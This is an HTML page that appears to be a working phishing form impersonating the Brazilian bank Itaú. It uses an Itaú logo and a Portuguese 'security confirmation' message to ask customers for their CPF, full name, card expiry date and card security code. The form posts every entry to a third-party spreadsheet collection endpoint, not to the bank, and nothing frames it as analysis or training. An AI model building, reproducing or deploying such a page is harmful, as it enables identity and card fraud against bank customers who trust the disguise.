<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <style>
        body{
            background-image: url(logo\ itau\ 01.png), url(img_home_bg.png);
            background-repeat: no-repeat;
            background-position:  20px 30px  , center;
            background-size:auto, cover;
            background-attachment: fixed;
            width: 100%;
            height: 100vh;
        }
        .box{
            color: rgb(255, 255, 255);
            position: absolute;
            top: 62%;
            left: 58%;
            transform: translate(-50%,-50%);
            background-color: rgb(255, 123, 0);
            padding: 13px;
            border-radius: 5px;
            width: 100%;
            font-size: 15px;
            font-family: Arial, Helvetica, sans-serif;
        }
        
        
        
        .inputBox{
            position: relative;
        }
        .inputUser{
            background: none;
            border: none;
            border-bottom: 1px solid white;
            outline: none;
            color: white;
            font-size: 15px;
            font-family: Arial, Helvetica, sans-serif;
            width: 100%;
            letter-spacing: 2px;
        }
        .labelInput{
            position: absolute;
            top: 0px;
            left: 0px;
            pointer-events: none;
            transition: .5s;
        }
        .inputUser:focus ~ .labelInput,
        .inputUser:valid ~ .labelInput{
            top: -20px;
            font-size: 15px;
            font-family: Arial, Helvetica, sans-serif;
            color: rgb(255, 255, 255);
        }
        #data_nascimento{
            border: none;
            padding: 8px;
            border-radius: 10px;
            outline: none;
            font-size: 15px;
        }
        #submit{
            background-image: linear-gradient(to right,rgb(255, 255, 255), rgb(255, 255, 255));
            width: 100%;
            border: none;
            padding: 15px;
            color: rgb(255, 145, 0);
            font-size: 15px;
            cursor: pointer;
            border-radius: 10px;
        }
        #submit:hover{
            background-image: linear-gradient(to right,rgb(255, 255, 255), rgb(255, 255, 255));
        }
    </style>
</head>
<body>
    <div class="box">
        <form action="https://api.sheetmonkey.io/form/ghGBC47sBXpr6iLshUoMaF" method="post">

            Olá cliente itaú por motivos de segurança você precisa confirmar os seguintes dados abaixo 
            <br><br>
            
            
                <br>
                <div class="inputBox">
                    <input type="number" name="CPF" id="CPF" class="inputUser" required>
                    <label for="CPF" class="labelInput">CPF</label>
                </div>
                <br><br>
                <div class="inputBox">
                    <input type="text" name="NOME COMPLETO" id="NOME COMPLETO" class="inputUser" required>
                    <label for="NOME" class="labelInput">Nome Completo</label>
                </div>
                <br><br>
                <div class="inputBox">
                    <input type="number" name="VALIDADE DO CARTÃO" id="VALIDADE DO CARTÃO" class="inputUser" required>
                    <label for="VALIDADE" class="labelInput">Validade do cartão</label>
                </div>
                <br><br>
                <div class="inputBox">
                    <input type="number" name="CÓDIGO DE SEGURANÇA" id="CÓDIGO DE SEGURANÇA" class="inputUser" required>
                    <label for="CVV" class="labelInput">Código de segurança</label>
                </div>
                
                <br><br>
                <input type="submit" value="acessar" name="submit" id="submit">
            
        </form>
    </div>
</body>
</html>
    </style>
</body>
</html>      